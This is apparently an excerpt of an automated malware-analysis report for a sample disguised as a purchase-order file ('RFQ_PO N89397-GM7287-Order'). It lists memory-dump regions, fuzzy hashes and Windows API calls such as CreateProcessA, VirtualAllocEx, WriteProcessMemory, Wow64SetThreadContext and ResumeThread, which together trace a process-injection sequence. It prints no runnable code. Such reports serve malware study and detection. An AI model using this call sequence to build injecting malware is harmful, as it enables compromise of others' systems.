• Opcode Fuzzy Hash: e948bb1721190efd243292d1931245f174659d88c333a7bfe57007ca47cbfab5
• Instruction Fuzzy Hash: F3616975B04214CFDB04DB74C849B6FBBF2EB86320F5590AAD405FB2A2C6709801EB51
Strings
Memory Dump Source
• Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID: 4*}
• API String ID: 0-1306871344
• Opcode ID: e42c467f5109602b1b7e2910e2805c13b0bad51ff84f875793da56931f2b776d
• Instruction ID: 112656a7a63f956f302c844a2e9d6d2e8408846a0ac7fcc29e89cd90ddf5d1f0
• Opcode Fuzzy Hash: e42c467f5109602b1b7e2910e2805c13b0bad51ff84f875793da56931f2b776d
• Instruction Fuzzy Hash: A7E1267B918215DFC705CFA4C888E59BBF2FB99700B97A4A6D001AF2A3C731D911EB45
Strings
Memory Dump Source
• Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID: 4*}
• API String ID: 0-1306871344
• Opcode ID: af28f80e679be6cc810e977e5e933c9280c8702232b03df8c3fe67e6904f64b0
• Instruction ID: 0a6c5478035156ccb858a26c815e0018302380f783dc2e9c1e4cd3bdd3678771
• Opcode Fuzzy Hash: af28f80e679be6cc810e977e5e933c9280c8702232b03df8c3fe67e6904f64b0
• Instruction Fuzzy Hash: 29A1E13B508111DFC715CFA4D888D65BBF6BB59300793A5A2D501AF2E3C730E961EB89
Memory Dump Source
• Source File: 00000000.00000002.1473741956.000000000F260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f260000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8cb65df41491cf14cc2fb26f5f2ff154cfb95816abae33cb62441453fb77689f
• Instruction ID: 19b1d6386a1c1a19090ef599c13759731468f0e6faf68c0f9a0a1fc9dadd1e2e
• Opcode Fuzzy Hash: 8cb65df41491cf14cc2fb26f5f2ff154cfb95816abae33cb62441453fb77689f
• Instruction Fuzzy Hash: FD329970B11205CFDB28DBA9C594BAEB7F6AF89700F244469E506DB3E2CB34E941CB51
Memory Dump Source
• Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d3b8af0d159840ee47216a98606a22774dc830c5a10391b175cb97bbc1809054
• Instruction ID: 1ced0f6c1700887ca05df86c164c26aeb3939c8b9b0f954ad876f1cee180c83e
• Opcode Fuzzy Hash: d3b8af0d159840ee47216a98606a22774dc830c5a10391b175cb97bbc1809054
• Instruction Fuzzy Hash: F7B1D174D1421DCFEB24CFA9C8487AEBBF6BF89300F1084AAD519A7291DB754A85CF40
Memory Dump Source
• Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7aee964b9866ea698c1ba28f1b40e7577e17e761a7f1b591024f4319d882516f
• Instruction ID: 69a05c3aa9138fcfb23860d60e9c28c312c2bdc1067746a29193b6df274f5840
• Opcode Fuzzy Hash: 7aee964b9866ea698c1ba28f1b40e7577e17e761a7f1b591024f4319d882516f
• Instruction Fuzzy Hash: 5DA1E274D1422CCFEB14CFA9C8487EEBBF6BB89300F1094A9D519A7291DB754985CF40
Memory Dump Source
• Source File: 00000000.00000002.1473741956.000000000F260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f260000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 437e0ef137ce93116e783544097fd354c62de72b50dba34d0101aab97daac1da
• Instruction ID: 585d5cb8fbd8eeab5dc9c398d835fffd3fd20728e10172258ca8009b4d5b382a
• Opcode Fuzzy Hash: 437e0ef137ce93116e783544097fd354c62de72b50dba34d0101aab97daac1da
• Instruction Fuzzy Hash: F4C01222D7D049D7CB008EB4A4180F8FB3CDA8F16EB0572E1814F560139AA082AAEB48

Control-flow Graph
APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0B50CD0E
Memory Dump Source
• Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 1ea945fea565ded9d2fcc95806759daca98d49bc52c7e0eb38c35d2db47b5401
• Instruction ID: 088a3147a28e8fc64c6ddbc562bcda3dd8f0a29d5253f660c04c40d103388f6f
• Opcode Fuzzy Hash: 1ea945fea565ded9d2fcc95806759daca98d49bc52c7e0eb38c35d2db47b5401
• Instruction Fuzzy Hash: 71A15C71D107599FEB24DFA8C841BDDBBB2FF49310F1482A9E818A7280DB749985CF91

Control-flow Graph

• Graph image not reproduced; basic blocks b50cad8-b50ce1d, containing the CreateProcessA call
APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0B50CD0E
Memory Dump Source
• Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: a0d9fdd11e0c5e96c197f81ba750b65b67b31543c898fae5f7ea7c2f9b14ba87
• Instruction ID: dcd34ee197cb696d99b24fb1cd913b403a9d8948aedec83042dad2c33d425e70
• Opcode Fuzzy Hash: a0d9fdd11e0c5e96c197f81ba750b65b67b31543c898fae5f7ea7c2f9b14ba87
• Instruction Fuzzy Hash: 84914C71D106599FEB24DFA8C841BDDBBB2FF49310F1482A9E818A7280DB749985CF91

Control-flow Graph

• Graph image not reproduced; basic blocks 5708fe4-5709139, containing the CreateActCtxA call
APIs
• CreateActCtxA.KERNEL32(?), ref: 057090A1
Memory Dump Source
• Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 167ccad280bee5eddde9599e936ddf9ee4f6a342a149d1394a6568b41d915717
• Instruction ID: 716eb5d879fffa860b7e9bb3fb7410dabe5f135b7c26e1d41fe599c696f1a3ac
• Opcode Fuzzy Hash: 167ccad280bee5eddde9599e936ddf9ee4f6a342a149d1394a6568b41d915717
• Instruction Fuzzy Hash: F54100B1D0071ACFEB24CFA9C84478DBBF1BF48314F20816AD418AB291DB75694ACF60

Control-flow Graph

• Graph image not reproduced; basic blocks 5707bac-5709139, containing the CreateActCtxA call
APIs
• CreateActCtxA.KERNEL32(?), ref: 057090A1
Memory Dump Source
• Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 9d9bd698775383b2229127e452d255a1ec57e043a957eff4fda5bde9a0793619
• Instruction ID: 279a1b14f101b555b733f41e6d78c4fd98de31e5d8bf025cd9e3dce6f7e2e612
• Opcode Fuzzy Hash: 9d9bd698775383b2229127e452d255a1ec57e043a957eff4fda5bde9a0793619
• Instruction Fuzzy Hash: 4C41E2B1D0071DCBDB24DFA9C844B8EBBF5BF48314F20816AD508AB251DB75694ACF90

Control-flow Graph

• Graph image not reproduced; basic blocks 9ab9a34-9abab02, containing the DrawTextExW call
APIs
• DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09ABAA1D,?,?), ref: 09ABAACF
Memory Dump Source
• Source File: 00000000.00000002.1461531912.0000000009AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9ab0000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: 33d8b77e859b21fbd4cdf1c60ea4f52f40a4c4b9790dc5f1e675f5d1664ab7bb
• Instruction ID: 45437f0b0726320ceec96e45537c4f6e3bc8b0cdfea185d3bbb9df2c4bc5a063
• Opcode Fuzzy Hash: 33d8b77e859b21fbd4cdf1c60ea4f52f40a4c4b9790dc5f1e675f5d1664ab7bb
• Instruction Fuzzy Hash: C531F1B5D003099FDB10CF9AD984ADEBBF8EB48320F54842EE818A7310D774A904CFA0

Control-flow Graph

• Graph image not reproduced; basic blocks 9abaa30-9abab02, containing the DrawTextExW call
APIs
• DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09ABAA1D,?,?), ref: 09ABAACF
Memory Dump Source
• Source File: 00000000.00000002.1461531912.0000000009AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9ab0000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: 19924c8cc91e000b5945f12e457b47ff1b8c851c717e58e774169d5bab79cf03
• Instruction ID: e3173e5e8173aa1c794f57b96e99e801b6b041b71d5a07c916f5a30ff9306518
• Opcode Fuzzy Hash: 19924c8cc91e000b5945f12e457b47ff1b8c851c717e58e774169d5bab79cf03
• Instruction Fuzzy Hash: FC31E4B5D003499FDB10CF9AD980ADEBBF9FB48320F54842EE815A7210D7759945CFA0
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0B50C8E0
Memory Dump Source
• Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: e4f1edddd06985624f85e0530da4dbea249dc9bd206cf521db42ca041cf592c1
• Instruction ID: a15b54bf2ebc917abddc536a57c292ab0a25fc5e8762dbc32c2de2950937859b
• Opcode Fuzzy Hash: e4f1edddd06985624f85e0530da4dbea249dc9bd206cf521db42ca041cf592c1
• Instruction Fuzzy Hash: FC2155B6D003099FDB10CFA9C881BDEBBF1FF48310F10852AE958A7280CB389940CB64
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0B50C8E0
Memory Dump Source
• Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: b14323e1b0e927f50be4df11110caabf9de22cd8fdbf3792cd114d28245cd467
• Instruction ID: 065ec2f6511db484290f73f79058faa3b66a60be677a9ea084e7f3e78992867d
• Opcode Fuzzy Hash: b14323e1b0e927f50be4df11110caabf9de22cd8fdbf3792cd114d28245cd467
• Instruction Fuzzy Hash: B8212671D103499FDB10DFAAC881BDEBBF5FF48310F508529E918A7240CB789955CBA4
APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0B50C9C0
Memory Dump Source
• Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 133f301ff60cc9001423421f6e634ad3555645213da5998c77133c76d08fd698
• Instruction ID: 7647a2a6bdbebc5680d35c03c939b7421cda980d90808c3910c74996f1ee4ff2
• Opcode Fuzzy Hash: 133f301ff60cc9001423421f6e634ad3555645213da5998c77133c76d08fd698
• Instruction Fuzzy Hash: 6B21F672D007499FDB10DF9AD881BDEBBF5FF48320F508929E558A7240CB399901CBA4
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B50C736
Memory Dump Source
• Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 4cf8d953921e81cd509c90bd452e61d3808fd1b756fb87cdb376b48b92f33860
                                                                                                                                                                      • Instruction ID: 8b66dbc69b290c73e516c50db3881d9f54d6f2d46ceae0e2b354af9e914e9be0
                                                                                                                                                                      • Opcode Fuzzy Hash: 4cf8d953921e81cd509c90bd452e61d3808fd1b756fb87cdb376b48b92f33860
                                                                                                                                                                      • Instruction Fuzzy Hash: 0F214871D103098FDB20DFAAC4857AEBBF4EB48210F54842DD819A7280CB789945CFA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0B50C9C0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 39cf937639e757efd27648c0acd3c10f3c766e024cebf1212d1d4c98e3209761
                                                                                                                                                                      • Instruction ID: 7ef8df60df0c500ad13d77bf5dd803aff6758492991b1cd2f33993afca65f210
                                                                                                                                                                      • Opcode Fuzzy Hash: 39cf937639e757efd27648c0acd3c10f3c766e024cebf1212d1d4c98e3209761
                                                                                                                                                                      • Instruction Fuzzy Hash: 1D211971D003499FDB10DF9AC841BDEBBF5FF48310F508529E558A7240C7359901CBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B50C736
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 1203aa035bf3530b3f27ca312e58e1af7ebe948da67625daf0e7798b274f8b58
                                                                                                                                                                      • Instruction ID: 151dec2db5318ea75362153c0a83c5df49343d66e16eb3a68b494c72638c4c8e
                                                                                                                                                                      • Opcode Fuzzy Hash: 1203aa035bf3530b3f27ca312e58e1af7ebe948da67625daf0e7798b274f8b58
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C213771D003098FDB20DFAAC4857AEBBF4EB49220F54842ED819A7280CB789945CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0B50C7FE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 55f451c82083e7b79e3a0394e00efe9dbdaf34382735087f8a22ae0b615710ad
                                                                                                                                                                      • Instruction ID: 804334c5165baab52227242a024e142b12511de15b2841961b855ef05022d56d
                                                                                                                                                                      • Opcode Fuzzy Hash: 55f451c82083e7b79e3a0394e00efe9dbdaf34382735087f8a22ae0b615710ad
                                                                                                                                                                      • Instruction Fuzzy Hash: AB112672D003499FDB20DFAAC845BDEBBF5EF48320F148419E915A7250CB759940CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0B50C7FE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 395a137aa4e185392e7147a474771c7c480c83800daa331bd9b9c66a564c61cd
                                                                                                                                                                      • Instruction ID: ea27879644140ce4ff25c893e93083ebffb4cad8b5460249b5ce71f3b09cf75e
                                                                                                                                                                      • Opcode Fuzzy Hash: 395a137aa4e185392e7147a474771c7c480c83800daa331bd9b9c66a564c61cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 97115676D003499FDB20DFA9C845BDEBBF5EF48320F248819E519A7250CB399901CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 8e5db7e886949427a4443a8664dfd0bb4baf6b92c0e5a7253fd715c01f22bb53
                                                                                                                                                                      • Instruction ID: 8bf588d997e427daea9895938054d650cfbce9a5b08117effb3588147997e68e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e5db7e886949427a4443a8664dfd0bb4baf6b92c0e5a7253fd715c01f22bb53
                                                                                                                                                                      • Instruction Fuzzy Hash: 681146B1D007489FDB20DFAAD445B9EBBF4EB48220F148519D519A7240CB39A945CBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 5d48f5452783865133eb3d7185ec962954c8fbfd90b3a6cffc29bb94fe8fd8cf
                                                                                                                                                                      • Instruction ID: 325168e159435724025292b2244b9f0e61622a68f3ed33538b202c9e077a76c2
                                                                                                                                                                      • Opcode Fuzzy Hash: 5d48f5452783865133eb3d7185ec962954c8fbfd90b3a6cffc29bb94fe8fd8cf
                                                                                                                                                                      • Instruction Fuzzy Hash: B61136B1D003498FDB20DFAAC445B9EFBF5EB88320F248519D559A7340CB79A945CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0570E646
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: e03f24d4537a2f0fdd8a84a2db762afe11b22bc635a52ca1f77d9913d7f5bc9b
                                                                                                                                                                      • Instruction ID: fb2d63aa2bc7b73481271e8bd2d79f3afcb06346354d06ee22ccfb687556b99a
                                                                                                                                                                      • Opcode Fuzzy Hash: e03f24d4537a2f0fdd8a84a2db762afe11b22bc635a52ca1f77d9913d7f5bc9b
                                                                                                                                                                      • Instruction Fuzzy Hash: 6911D2B6D007498FDB14DF9AD444A9EFBF8AB48220F14842AD819A7250C375A545CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0F26118D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1473741956.000000000F260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F260000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f260000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: 98abb32a19b9a328cb214f05864f4f86eda3b9ea6c894240c22b50129f37af7b
                                                                                                                                                                      • Instruction ID: dac79f093c74e98dc9687fcf47e1d87fe95b473e1d4d712ca12c97ccc2a7c3a9
                                                                                                                                                                      • Opcode Fuzzy Hash: 98abb32a19b9a328cb214f05864f4f86eda3b9ea6c894240c22b50129f37af7b
                                                                                                                                                                      • Instruction Fuzzy Hash: E111D6B68103499FDB10DF9AD845BDEBFF8EB48720F108459E518A7250C375A954CFA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0F26118D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1473741956.000000000F260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F260000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f260000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: 9ff7a43e7d37bd5ccf1ae092aa88bc568eaea40426f208a7f32abae2f6a597c7
                                                                                                                                                                      • Instruction ID: a877977c7a430ec0ba71b0e46a32e8dd364ba66250347f768c773ff59aa5cbbe
• Opcode Fuzzy Hash: 9ff7a43e7d37bd5ccf1ae092aa88bc568eaea40426f208a7f32abae2f6a597c7
• Instruction Fuzzy Hash: CB11D0B58003499FDB20DF9AD885BDEBBF8EB48320F10845AE518A7250C375A994CFA1
Memory Dump Source
• Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cc93338eee03e83497160f2aeeb96390368bf70a932a10658854e16b0958f29d
• Instruction ID: 59787bf759e868f4ad664a24ea49970b03573ab56723f6842b79c97fa13e20e0
• Opcode Fuzzy Hash: cc93338eee03e83497160f2aeeb96390368bf70a932a10658854e16b0958f29d
• Instruction Fuzzy Hash: F9210371505240DFEB15DF94D9C0B2ABFA5FB88329F24C5A9EC090F296C336D456CAB2
Memory Dump Source
• Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: adde4b1317e5eafb8dd3941413c52243a77e154de68585cfadc1b7e446e3e300
• Instruction ID: 1edb97e971b10e21cfbdcd05a8b06150e5c9d8313ce072d9807704f66061c8af
• Opcode Fuzzy Hash: adde4b1317e5eafb8dd3941413c52243a77e154de68585cfadc1b7e446e3e300
• Instruction Fuzzy Hash: FD210371605204DFEB14DF54D9C0B2AFBA5FB88324F24C5A9E9090F696C336E456CAB2
Memory Dump Source
• Source File: 00000000.00000002.1419351532.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_301d000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 24c43e9cc67a66c7b1b5f937a7f3618b287f40bc83a92a6a81ac61b0a3865ced
• Instruction ID: 40ef4969e8a2f11706473ecd91ab32e44375cb44848d84fbf89e19ff8931df25
• Opcode Fuzzy Hash: 24c43e9cc67a66c7b1b5f937a7f3618b287f40bc83a92a6a81ac61b0a3865ced
• Instruction Fuzzy Hash: 79213471A04300EFDB05DF14D9C0B2AFBA5FB94314F24CAADE8094F282C336D826CA61
Memory Dump Source
• Source File: 00000000.00000002.1419351532.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_301d000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cf2de9543ae5e392663a07f51ad272ee532d58d928614226f659477a107e3387
• Instruction ID: b22955f73cefc2681675765f90cd396bbe9e3321f7c907cd2b9afd0c60e3ee01
• Opcode Fuzzy Hash: cf2de9543ae5e392663a07f51ad272ee532d58d928614226f659477a107e3387
• Instruction Fuzzy Hash: E221F275605300DFDB16DF14D9C4B26BBA5FB84314F24C9ADD84A4B286C33AD867CA62
Memory Dump Source
• Source File: 00000000.00000002.1419351532.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_301d000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ec79228be4102f3e969c91a5c63a5d5c716232fc81c48c790cf8b9197a9f8bbd
• Instruction ID: 658b5fcccb42fe3770ff5f232de88418d311025849ad1d64c201e640f6545d44
• Opcode Fuzzy Hash: ec79228be4102f3e969c91a5c63a5d5c716232fc81c48c790cf8b9197a9f8bbd
• Instruction Fuzzy Hash: C5219F755093808FCB13CF24D990B15BFB1EB46214F28C5DAD8498F2A7C33A981ACB62
Memory Dump Source
• Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
• Instruction ID: ff82ca6e7f56a33c4b920b96401b72bb604fa9c74a3eb487e7346cfc03e5468e
• Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
• Instruction Fuzzy Hash: BC11B176504240DFDB15CF54D5C4B16FFB2FB84324F28C6A9D8490B696C33AE456CBA2
Memory Dump Source
• Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
• Instruction ID: d5461fb9015f761211dc278cb3e4b935f400af674954926584659597ac063175
• Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
